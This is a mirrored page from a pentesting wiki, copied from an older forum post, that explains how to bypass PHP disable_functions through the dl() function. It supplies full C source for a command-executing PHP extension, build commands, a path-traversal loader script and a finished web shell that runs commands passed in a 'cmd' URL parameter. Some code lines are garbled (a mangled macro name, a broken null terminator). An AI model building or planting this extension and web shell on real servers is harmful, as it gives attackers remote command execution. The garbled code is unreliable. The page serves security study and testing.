mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-25 03:15:12 +00:00
266 lines
9.5 KiB
Markdown
266 lines
9.5 KiB
Markdown
|
# disable\_functions bypass - dl function
|
||
|
|
||
|
**`dl`** is a PHP function that can be used to load PHP extensions. It the function isn't disabled it could be abused to **bypass `disable_functions` and execute arbitrary commands**.
|
||
|
However, it has some strict limitations:
|
||
|
|
||
|
* The `dl` function must be **present** in the **environment** and **not disabled**
|
||
|
* The PHP Extension **must be compiled with the same major version** \(PHP API version\) that the server is using \(you can see this information in the output of phpinfo\)
|
||
|
* The PHP extension must be **located in the directory** that is **defined** by the **`extension_dir`** directive \(you can see it in the output of phpinfo\). It's very unprobeable that an attacker trying to abuse the server will have write access over this directory, so this requirement probably will prevent you to abuse this technique\).
|
||
|
|
||
|
**If you meet these requirements, continue reading this post copied from** [**https://antichat.com/threads/70763/**](https://antichat.com/threads/70763/) **to learn how to bypass disable\_functions**
|
||
|
|
||
|
When the admin was configuring the box he/she overlooked the [dl function](http://www.php.net/manual/en/function.dl.php) and didn't disable it since there was no mention of being able to execute system commands.
|
||
|
The [dl function](http://www.php.net/manual/en/function.dl.php) is used to loads PHP extensions when a script is executed.
|
||
|
|
||
|
\(PHP extensions are written in C/C++ and are used to give PHP more functionality.\)
|
||
|
|
||
|
The attacker notices the function isn't disabled and sees potential and decides to create a PHP extension.
|
||
|
The attacker checks the version of PHP using a small script`<?php echo 'PHP Version is '.PHP_VERSION; ?>` \(PHP\_VERSION is a predefined constant that contains the version number of PHP.\)
|
||
|
|
||
|
The attacker notes the version and downloads the tarball from the [PHP website](http://www.php.net/downloads.php), in this scenario the version is older than the current release so the attacker has to go to the [archive](http://museum.php.net/).
|
||
|
|
||
|
Next he extracts the source and [compiles and installs](http://www.php.net/manual/en/install.php) the version of PHP on his own box.
|
||
|
|
||
|
Now it's time to create the extension
|
||
|
The attacker reads up on [creating PHP extensions](http://www.php.net/manual/en/zend.creating.php) from the PHP site.
|
||
|
After reading through the documentation and creating some extensions of his own he decides to look at the PHP code base since the function he's after is already created.
|
||
|
|
||
|
The function that will be duplicated will be the [exec function](http://www.php.net/manual/en/function.exec.php)
|
||
|
in the code base it's located in ext/standard/exec.c
|
||
|
|
||
|
The relevant parts are implemented into a new extension of its own.
|
||
|
|
||
|
The files for the separate extension end up as below:
|
||
|
|
||
|
{% code title="bypass.c" %}
|
||
|
```c
|
||
|
/*
|
||
|
+----------------------------------------------------------------------+
|
||
|
| Copyright (c) 1997-2003 The PHP Group |
|
||
|
+----------------------------------------------------------------------+
|
||
|
| This source file is subject to version 2.02 of the PHP license, |
|
||
|
| that is bundled with this package in the file LICENSE, and is |
|
||
|
| available at through the world-wide-web at |
|
||
|
| http://www.php.net/license/2_02.txt. |
|
||
|
| If you did not receive a copy of the PHP license and are unable to |
|
||
|
| obtain it through the world-wide-web, please send a note to |
|
||
|
| license@php.net so we can mail you a copy immediately. |
|
||
|
+----------------------------------------------------------------------+
|
||
|
*/
|
||
|
|
||
|
|
||
|
#ifdef HAVE_CONFIG_H
|
||
|
#include "config.h"
|
||
|
#endif
|
||
|
|
||
|
#include "php.h"
|
||
|
#include "php_bypass.h"
|
||
|
|
||
|
static function_entry bypass_functions[] = {
|
||
|
PHP_FE(bypass_exec, NULL)
|
||
|
{NULL, NULL, NULL}
|
||
|
};
|
||
|
|
||
|
zend_module_entry bypass_module_entry = {
|
||
|
#if ZEND_MODULE_API_NO >= 20010901
|
||
|
STANDARD_MODULE_HEADER,
|
||
|
#endif
|
||
|
PHP_BYPASS_EXTNAME,
|
||
|
bypass_functions,
|
||
|
NULL,
|
||
|
NULL,
|
||
|
NULL,
|
||
|
NULL,
|
||
|
NULL,
|
||
|
#if ZEND_MODULE_API_NO >= 20010901
|
||
|
PHP_BYPASS_VERSION,
|
||
|
#endif
|
||
|
STANDARD_MODULE_PROPERTIES
|
||
|
};
|
||
|
|
||
|
#ifdef COMPILE_DL_BYPASS
|
||
|
ZEND_GET_MODULE(bypass)
|
||
|
#endif
|
||
|
|
||
|
|
||
|
PHP_FUNCTION(bypass_exec){
|
||
|
FILE *in;
|
||
|
int readbytes, total_readbytes=0, allocated_space;
|
||
|
pval **cmd;
|
||
|
char *ret;
|
||
|
|
||
|
if (ZEND_NUM_ARGS()!=1 || zend_get_parameters_ex(1, &cmd)==FAILURE) {
|
||
|
WRONG_PARAM_COUNT;
|
||
|
}
|
||
|
|
||
|
convert_to_string_ex(cmd);
|
||
|
#ifdef PHP_WIN32
|
||
|
if ((in=VCWD_POPEN(Z_STRVAL_PP(cmd), "rt"))==NULL) {
|
||
|
#else
|
||
|
if ((in=VCWD_POPEN(Z_STRVAL_PP(cmd), "r"))==NULL) {
|
||
|
#endif
|
||
|
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Unable to execute '%s'", Z_STRVAL_PP(cmd));
|
||
|
RETURN_FALSE;
|
||
|
}
|
||
|
|
||
|
allocated_space = EXEC_INPUT_BUF;
|
||
|
ret = (char *) emalloc(allocated_space);
|
||
|
|
||
|
while (1) {
|
||
|
readbytes = fread(ret+total_readbytes, 1, EXEC_INPUT_BUF, in);
|
||
|
if (readbytes<=0) {
|
||
|
break;
|
||
|
}
|
||
|
|
||
|
total_readbytes += readbytes;
|
||
|
allocated_space = total_readbytes+EXEC_INPUT_BUF;
|
||
|
ret = (char *) erealloc(ret, allocated_space);
|
||
|
}
|
||
|
|
||
|
pclose(in);
|
||
|
|
||
|
RETVAL_STRINGL(ret, total_readbytes, 0);
|
||
|
Z_STRVAL_P(return_value)[total_readbytes] = '\';
|
||
|
}
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
{% code title="php\_bypass.h" %}
|
||
|
```c
|
||
|
#ifndef PHP_BYPASS_H
|
||
|
#define PHP_BYPASS_H 1
|
||
|
|
||
|
#define PHP_BYPASS_VERSION "1.0"
|
||
|
#define PHPphp_bypass.h_BYPASS_EXTNAME "bypass"
|
||
|
|
||
|
PHP_FUNCTION(bypass_exec);
|
||
|
|
||
|
extern zend_module_entry bypass_module_entry;
|
||
|
#define phpext_bypass_ptr &bypass_module_entry
|
||
|
|
||
|
#endif
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
{% code title="config.m4" %}
|
||
|
```bash
|
||
|
HP_ARG_ENABLE(bypass, whether to enable bypass support,
|
||
|
[ --enable-bypass Enable bypass support])
|
||
|
|
||
|
if test "$PHP_BYPASS" = "yes"; then
|
||
|
AC_DEFINE(HAVE_BYPASS, 1, [Whether you have bypass])
|
||
|
PHP_NEW_EXTENSION(bypass, bypass.c, $ext_shared)
|
||
|
fi
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
Once the files are created it's time to build the PHP extension.
|
||
|
|
||
|
```text
|
||
|
phpize
|
||
|
./configure
|
||
|
make
|
||
|
```
|
||
|
|
||
|
Once this is done the compiled extension will be located in the modules sub directory with the filename bypass.so.
|
||
|
The file is copied to a safe place, now the following commands are executed to clean up the newly created files.
|
||
|
|
||
|
```text
|
||
|
make clean
|
||
|
phpize --clean
|
||
|
```
|
||
|
|
||
|
Now the attacker uploads the newly created extension to the victim host.
|
||
|
|
||
|
\(NOTE: Major releases of PHP use different API versions, in order for you to be able to compile the extension on one host and upload it to another the API versions must match. This is why initially the same PHP version was installed on the attackers box. \)
|
||
|
|
||
|
In order to load an extension with the dl function the extension needs to be in the the extension directory which is defined by the extension\_dir directive.
|
||
|
This can be a problem since it's less likely for the attacker to have write permissions in this directory, there is however a way to get passed this.
|
||
|
This problem has been discussed by developers on the dl function page within the notes section.
|
||
|
|
||
|
The concept that was discussed is to use a relative path from the defined extension directory.
|
||
|
For example if the extension directory was set to /usr/php/extensions and you'd like to load bypass.so in the current web directory /home/example.com/html you would do as follows:
|
||
|
|
||
|
```php
|
||
|
<?php
|
||
|
dl('../../../home/example.com/html/bypass.so');
|
||
|
?>
|
||
|
```
|
||
|
|
||
|
This will get passed the need to have the extension in the defined extension directory.
|
||
|
|
||
|
There is also an automated way so you won't have to change the relative path for different hosts, this code was created by endofyourself \[at\] yahoo \[dot\] com and improved apon later on by mag\_2000 \[at\] front \[dot\] ru
|
||
|
|
||
|
There was one minor problem with the function, on some hosts the extension directory is set to "./" this function didn't take into account if the extension directory was set to a relative path, the fix for this is too use the realpath function.
|
||
|
|
||
|
The final script used to load the extension and execute system commands to bypass the disabled functions is as follows:
|
||
|
|
||
|
```php
|
||
|
<?php
|
||
|
|
||
|
function dl_local( $extensionFile ) {
|
||
|
if(!(bool)ini_get('enable_dl')
|
||
|
||(bool)ini_get('safe_mode')){
|
||
|
die('Loading extensions is not permitted.');
|
||
|
}
|
||
|
|
||
|
if(!file_exists($extensionFile)){
|
||
|
die('File '.$extensionFile.' does not exist.');
|
||
|
}
|
||
|
|
||
|
if(!is_executable($extensionFile)){
|
||
|
die('File '.$extensionFile.' is not executable. ( chmod +x '.$extensionFile.' )');
|
||
|
}
|
||
|
|
||
|
$currentDir = getcwd().'/';
|
||
|
$currentExtPath = realpath(ini_get('extension_dir'));
|
||
|
|
||
|
$subDirs = preg_match_all("/\//",$currentExtPath ,$matches);
|
||
|
unset($matches);
|
||
|
|
||
|
if(!(bool)$subDirs){
|
||
|
die('Could not determine a valid extension path [extension_dir]');
|
||
|
}
|
||
|
|
||
|
$extPathLastChar=strlen($currentExtPath )-1;
|
||
|
|
||
|
if($extPathLastChar==strrpos($currentExtPath,'/')){
|
||
|
$subDirs--;}$backDirStr = '';
|
||
|
|
||
|
for($i = 1; $i <= $subDirs; $i++){
|
||
|
$backDirStr .='..';
|
||
|
if($i != $subDirs){
|
||
|
$backDirStr .='/';
|
||
|
}
|
||
|
}
|
||
|
|
||
|
$finalExtPath = $backDirStr.$currentDir.$extensionFile;
|
||
|
if(!dl($finalExtPath)){
|
||
|
die();
|
||
|
}
|
||
|
|
||
|
|
||
|
$loadedExtensions = get_loaded_extensions();
|
||
|
$thisExtName = $loadedExtensions[sizeof($loadedExtensions)-1];
|
||
|
return $thisExtName;
|
||
|
}
|
||
|
|
||
|
@ini_set ('display_errors','1');
|
||
|
error_reporting(E_ALL);
|
||
|
|
||
|
dl_local('bypass.so');
|
||
|
|
||
|
if(@$_GET['cmd']){
|
||
|
$output = bypass_exec($_GET['cmd']);
|
||
|
echo '<pre>'.$output.'</pre>';
|
||
|
}
|
||
|
?>
|
||
|
```
|
||
|
|
||
|
All the attacker has to do now to execute commands is call the URL to the script along with a cmd variable with the desired command.
|
||
|
|
||
|
```text
|
||
|
http://www.example.com/script.php?cmd=ls
|
||
|
```
|
||
|
|